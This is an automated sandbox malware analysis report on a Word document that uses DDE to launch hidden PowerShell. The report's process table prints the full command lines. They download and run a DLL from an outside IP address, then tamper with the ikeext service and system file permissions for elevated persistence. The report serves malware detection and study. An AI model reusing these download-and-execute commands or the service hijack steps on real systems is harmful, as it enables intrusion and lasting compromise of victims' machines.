Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL

Analysis Information

Creation Time	2017-10-11 13:00 (UTC+2)
VM Analysis Duration Time	00:02:16
Execution Successful
Sample Filename	exaai.doc
Command Line Parameters
Prescript
Number of Processes	21
Termination Reason	Timeout
Reputation Enabled
Download	Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON

VTI Information

VTI Score 100 / 100
VTI Database Version	2.6
VTI Rule Match Count	30
VTI Rule Type	Documents

Tags

#malware

Screenshots

Monitored Processes

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x98c	Analysis Target	Medium	winword.exe	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
#2	0xa38	Child Process	Medium	cmd.exe	c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK	#1
#3	0xa50	Child Process	Medium	powershell.exe	powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK	#2
#4	0xae4	Child Process	Medium	rundll32.exe	"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK	#3
#5	0xb54	RPC Server	High (Elevated)	dllhost.exe	C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}	#4
#6	0xb74	Child Process	High (Elevated)	rundll32.exe	"C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS	#5
#7	0xb7c	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "net stop /y ikeext"	#6
#8	0xb90	Child Process	High (Elevated)	net.exe	net stop /y ikeext	#7
#9	0xb98	Child Process	High (Elevated)	net1.exe	C:\Windows\system32\net1 stop /y ikeext	#8
#10	0xba0	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll"	#6
#12	0xbc0	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F"	#6
#14	0xbe0	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F"	#6
#16	0xc00	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto"	#6
#17	0xc14	Child Process	High (Elevated)	sc.exe	sc config ikeext start= auto	#16
#18	0xc20	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c "net start ikeext"	#6
#19	0xc34	Child Process	High (Elevated)	net.exe	net start ikeext	#18
#20	0xc3c	Child Process	High (Elevated)	net1.exe	C:\Windows\system32\net1 start ikeext	#19
#23	0xcc4	Child Process	Medium	cmd.exe	cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" "	#4
#24	0xce0	Child Process	Medium	attrib.exe	ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll"	#23
#25	0xce8	Child Process	Medium	ping.exe	Ping 127.0.0.1 -n 3	#23
#26	0xd04	Child Process	Medium	cmd.exe	cmd.exe /c exit	#23

Sample Information

ID	#19550
MD5 Hash Value	292843976600e8ad2130224d70356bfc
SHA1 Hash Value	31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809
SHA256 Hash Value	d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e
Filename	exaai.doc
File Size	19.98 KB (20457 bytes)
File Type	Word Document
Has VBA Macros

Analyzer and Virtual Machine Information

Analyzer Version	2.2.0
Analyzer Build Date	2017-09-28 17:24
Microsoft Office Version	2013
Microsoft Word Version	15.0.4569.1504
Internet Explorer Version	8.0.7601.17514
Chrome Version	58.0.3029.110
Firefox Version	25.0
Flash Version	10.3.183.90
Java Version	7.0.600
VM Name	win7_32_sp1-mso2013
VM Architecture	x86 32-bit PAE
VM OS	Windows 7
VM Kernel Version	6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)